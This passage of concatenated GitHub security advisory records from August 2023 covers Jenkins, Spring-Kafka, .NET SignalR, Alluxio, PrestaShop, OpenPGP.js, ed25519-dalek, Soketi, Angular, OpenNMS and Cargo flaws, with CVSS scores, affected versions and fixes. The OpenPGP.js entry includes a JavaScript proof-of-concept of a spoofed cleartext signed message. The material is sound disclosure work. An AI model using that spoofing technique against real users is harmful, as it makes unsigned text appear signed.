{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T17:00:55Z', 'nvd_published_at': None}
1.4.0
GHSA-22c3-whjv-hrfm
2023-08-16T21:14:04Z
2023-08-16T15:30:17Z
null
['CVE-2023-40337']
Jenkins Folders Plugin cross-site request forgery vulnerability
Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to copy a view inside a folder. Folders Plugin 6.848.ve3b_fd7839a_81 requires POST requests for the affected HTTP endpoint.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cloudbees-folder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.848.ve3b'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40337'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3105'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:14:04Z', 'nvd_published_at': None}
1.4.0
GHSA-crqf-q9fp-hwjw
2023-08-29T22:17:18Z
2023-08-24T15:31:10Z
null
['CVE-2023-34040']
Spring-Kafka has Java Deserialization vulnerability When Improperly Configured
In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers. Specifically, an application is vulnerable when all of the following are true: * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true. * The user allows untrusted sources to publish to a Kafka topic By default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.9.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34040'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/eb779679812f61a8553ced3d0e4069dca65560ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-kafka'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34040'}]
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:28:48Z', 'nvd_published_at': None}
1.4.0
GHSA-j8rm-cm55-qqj6
2023-08-11T20:54:45Z
2023-08-11T20:54:45Z
null
['CVE-2023-35391']
.NET Information Disclosure Vulnerability
# Microsoft Security Advisory CVE-2023-35391: .NET Information Disclosure Vulnerability ## <a name="executive-summary"></a>Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET core 2.1, .NET 6.0 and, .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in ASP.NET Core 2.1, .NET 6.0 and, .NET 7.0 applications using SignalR when redis backplane use might result in information disclosure. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/267 ### <a name="mitigation-factors"></a>Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## <a name="affected-software"></a>Affected software * Any .NET 7.0 application running on .NET 7.0.9 or earlier. * Any .NET 6.0 application running on .NET 6.0.20 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### <a name=".NET 7"></a>.NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 7.0.0, <= 7.0.9 | 7.0.10 ### <a name=".NET 6"></a>.NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 6.0.0, <= 6.0.20 | 6.0.21 ### <a name="ASP.NET Core 2.1"></a>ASP.NET Core 2.1 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.Redis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.Redis) | < 1.0.40 | 1.0.40 ## Advisory FAQ ### <a name="how-affected"></a>How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### <a name="how-fix"></a>How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>. ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-35391]( https://www.cve.org/CVERecord?id=CVE-2023-35391) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.Redis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.40'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-j8rm-cm55-qqj6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35391'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/267'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35391'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T20:54:45Z', 'nvd_published_at': None}
1.4.0
GHSA-xrrh-h86w-pwfj
2023-08-24T22:03:57Z
2023-08-15T18:31:32Z
null
['CVE-2023-38889']
Alluxio vulnerable to arbitrary code execution
An issue in Alluxio v.2.9.3 and before allows an attacker to execute arbitrary code via a crafted script to the username parameter of lluxio.util.CommonUtils.getUnixGroups(java.lang.String).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.alluxio:alluxio-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38889'}, {'type': 'WEB', 'url': 'https://github.com/Alluxio/alluxio/issues/17766'}, {'type': 'PACKAGE', 'url': 'https://github.com/Alluxio/alluxio'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:01:44Z', 'nvd_published_at': None}
1.4.0
GHSA-v4gr-v679-42p7
2023-08-09T14:39:21Z
2023-08-09T14:39:21Z
null
['CVE-2023-39530']
PrestaShop file deletion via CustomerMessage
### Impact It is possible to delete files from the server via the CustomerMessage API ### Patches 8.1.1 ### Found by Kto94 (via Yeswehack) ### Workarounds none ### References none
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-v4gr-v679-42p7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39530'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/6ce750b2367a7309b6bf50166f1873cb86ad57e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:39:21Z', 'nvd_published_at': None}
1.4.0
GHSA-52h8-c876-989c
2023-08-03T16:42:42Z
2023-08-03T06:30:23Z
null
['CVE-2023-4127']
Answer has Race Condition within a Thread
Race Condition within a Thread in GitHub repository answerdev/answer prior to v1.1.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4127'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/47661dc8a356ce6aa7793f1bd950399292180182'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf7d19e3-1318-4c77-8366-d8d04a0b41ba'}]
{'cwe_ids': ['CWE-366'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:42Z', 'nvd_published_at': None}
1.4.0
GHSA-ch3c-v47x-4pgp
2023-08-29T17:36:40Z
2023-08-29T17:36:40Z
null
['CVE-2023-41037']
Cleartext Signed Message Signature Spoofing in openpgp
### Impact OpenPGP Cleartext Signed Messages are cryptographically signed messages where the signed text is readable without special tools: ``` -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 This text is signed. -----BEGIN PGP SIGNATURE----- wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+ BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM= -----END PGP SIGNATURE----- ``` These messages typically contain a "Hash: ..." header declaring the hash algorithm used to compute the signature digest. OpenPGP.js up to v5.9.0 ignored any data preceding the "Hash: ..." texts when verifying the signature. As a result, malicious parties could add arbitrary text to a third-party Cleartext Signed Message, to lead the victim to believe that the arbitrary text was signed. A user or application is vulnerable to said attack vector if it verifies the CleartextMessage by only checking the returned `verified` property, discarding the associated `data` information, and instead _visually trusting_ the contents of the original message: ```js const cleartextMessage = ` -----BEGIN PGP SIGNED MESSAGE----- This text is not signed but you might think it is. Hash: SHA256 This text is signed. -----BEGIN PGP SIGNATURE----- wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+ BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM= -----END PGP SIGNATURE----- `; const message = await openpgp.readCleartextMessage({ cleartextMessage }); const verificationResult = await verifyCleartextMessage({ message, verificationKeys }); console.log(await verificationResult.verified); // output: true console.log(verificationResult.data); // output: 'This text is signed.' ``` Since `verificationResult.data` would always contain the actual signed data, users and apps that check this information are not vulnerable. Similarly, given a CleartextMessage object, retrieving the data using `getText()` or the `text` field returns only the contents that are considered when verifying the signature. Finally, re-armoring a CleartextMessage object (using `armor()` will also result in a "sanitised" version, with the extraneous text being removed. Because of this, we consider the vulnerability impact to be very limited when the CleartextMessage is processed programmatically; this is reflected in the Severity CVSS assessment, specifically in the scope's score ("Unchanged"). ### Patches - v5.10.1 (current stable version) will reject messages when calling `openpgp.readCleartextMessage()` - v4.10.11 (legacy version) will reject messages when calling `openpgp.cleartext.readArmored()` ### Workarounds Check the contents of `verificationResult.data` to see what data was actually signed, rather than visually trusting the contents of the armored message. ### References Similar CVE: https://sec-consult.com/vulnerability-lab/advisory/cleartext-message-spoofing-in-go-cryptography-libraries-cve-2019-11841/
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.10.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/security/advisories/GHSA-ch3c-v47x-4pgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41037'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/commit/6b43e02a254853f5ff508ebd1b07541f78b7c566'}, {'type': 'PACKAGE', 'url': 'https://github.com/openpgpjs/openpgpjs'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v4.10.11'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v5.10.1'}]
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:36:40Z', 'nvd_published_at': None}
1.4.0
GHSA-w5vr-6qhr-36cc
2023-08-14T21:10:29Z
2023-08-14T21:10:29Z
null
[]
`ed25519-dalek` Double Public Key Signing Function Oracle Attack
Versions of `ed25519-dalek` prior to v2.0 model private and public keys as separate types which can be assembled into a `Keypair`, and also provide APIs for serializing and deserializing 64-byte private/public keypairs. Such APIs and serializations are inherently unsafe as the public key is one of the inputs used in the deterministic computation of the `S` part of the signature, but not in the `R` value. An adversary could somehow use the signing function as an oracle that allows arbitrary public keys as input can obtain two signatures for the same message sharing the same `R` and only differ on the `S` part. Unfortunately, when this happens, one can easily extract the private key. Revised public APIs in v2.0 of `ed25519-dalek` do NOT allow a decoupled private/public keypair as signing input, except as part of specially labeled "hazmat" APIs which are clearly labeled as being dangerous if misused.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'ed25519-dalek'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/MystenLabs/ed25519-unsafe-libs'}, {'type': 'PACKAGE', 'url': 'https://github.com/dalek-cryptography/ed25519-dalek'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2022-0093.html'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:10:29Z', 'nvd_published_at': None}
1.4.0
GHSA-g6w6-h933-4rc5
2023-08-03T19:44:52Z
2023-08-03T19:44:52Z
null
[]
Soketi was exposed to Sandbox Escape vulnerability via vm2
### Impact _What kind of vulnerability is it? Who is impacted?_ Anyone who might have used Soketi with the `cluster` driver (or through PM2). ### Patches _Has the problem been patched? What versions should users upgrade to?_ Get the latest version of Soketi. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ None. It's advised to upgrade to the latest version. ### References _Are there any links users can visit to find out more?_ - https://github.com/advisories/GHSA-cchq-frgv-rjh5 - https://github.com/patriksimek/vm2/issues/533 - https://github.com/Unitech/pm2/issues/5643
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': '@soketi/soketi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/soketi/soketi/security/advisories/GHSA-g6w6-h933-4rc5'}, {'type': 'WEB', 'url': 'https://github.com/Unitech/pm2/issues/5643'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/533'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/pull/927'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/commit/de12bff706c0d62e6a57dc1c7be3c4f014d0093a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-cchq-frgv-rjh5'}, {'type': 'PACKAGE', 'url': 'https://github.com/soketi/soketi'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/releases/tag/1.6.0'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:52Z', 'nvd_published_at': None}
1.4.0
GHSA-m9r4-3fg7-pqm2
2023-08-09T14:35:36Z
2023-08-09T14:35:36Z
null
['CVE-2023-39525']
PrestaShop path traversal
### Impact In the back office, files can be compromised using path traversal by replaying the import file deletion query with a specified file path, using traversal path. ### Patches 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds none ### References none
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-m9r4-3fg7-pqm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39525'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/c7c9a5110421bb2856f4d312ecce192d079b5ec7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:35:36Z', 'nvd_published_at': None}
1.4.0
GHSA-r3hf-q8q7-fv2p
2023-08-09T12:51:51Z
2023-08-09T12:51:51Z
null
[]
Angular critical CSS inlining Cross-site Scripting Vulnerability Advisory
### Impact Angular Universal applications on 16.1.0 and 16.1.1 using critical CSS inlining are vulnerable to a [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) attack where an attacker can trick another user into visiting a page which injects malicious JavaScript. Angular CLI applications without Universal do perform critical CSS inlining as well, however exploiting this requires a malicious actor to already have access to modify source code directly. ### Patches `@nguniversal/common` should be upgraded to 16.1.2 or higher. 16.2.0-rc.0 is safe. ### Workarounds The easiest solution is likely to upgrade Universal to 16.1.2 or downgrade to 16.0.x or lower. Alternatively you can [override](https://docs.npmjs.com/cli/v9/configuring-npm/package-json#overrides) specifically the `critters` dependency with version `0.0.20` in your `package.json`. ```json { "overrides": { "critters": "0.0.20" } } ``` ### References * [Angular Blog Post](https://blog.angular.io/notice-of-xss-issue-affecting-angular-universal-16-1-0-16-1-1-95dbae068f)
[]
[{'package': {'ecosystem': 'npm', 'name': '@nguniversal/common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.1.0'}, {'fixed': '16.1.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/angular/universal/security/advisories/GHSA-r3hf-q8q7-fv2p'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/universal'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T12:51:51Z', 'nvd_published_at': None}
1.4.0
GHSA-r285-q736-9v95
2023-09-07T18:51:03Z
2023-08-31T00:30:17Z
null
['CVE-2023-39137']
Filename spoofing in archive
An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Pub', 'name': 'archive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.7'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39137'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/issues/266'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/commit/0d17b270a3c33d3bed56cadd9a43da7717ab11f4'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/brendan-duncan/archive'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-3'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_name_spoofing/'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:43:38Z', 'nvd_published_at': None}
1.4.0
GHSA-qfw7-pfxx-h9q2
2023-08-23T20:07:41Z
2023-08-14T18:32:59Z
null
['CVE-2023-40311']
OpenNMS vulnerable to Cross-site Scripting
Multiple stored XSS were found on different JSP files with unsanitized parameters in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms that allow an attacker to store on database and then load on JSPs or Angular templates. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Jordi Miralles Comins for reporting this issue.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40311'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6365'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6366'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/6ccc5de1a23d440560e0f09dfd94f8392c21e70d'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/c67d1cae2fa1fb806c9d422f6e6fbf4ebfde6b60'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:09Z', 'nvd_published_at': None}
1.4.0
GHSA-xw2r-f8xv-c8xp
2023-08-09T14:37:16Z
2023-08-09T14:37:16Z
null
['CVE-2023-39527']
PrestaShop XSS injection through Validate::isCleanHTML method
### Impact xss injection through `isCleanHTML` method ### Patches 1.7.8.10 8.0.5 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds ### References
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.10'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xw2r-f8xv-c8xp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39527'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/afc14f8eaa058b3e6a20ac43e033ee2656fb88b4'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:37:16Z', 'nvd_published_at': None}
1.4.0
GHSA-j3xp-wfr4-hx87
2023-08-03T16:30:52Z
2023-08-03T16:30:52Z
null
['CVE-2023-38497']
Cargo not respecting umask when extracting crate archives
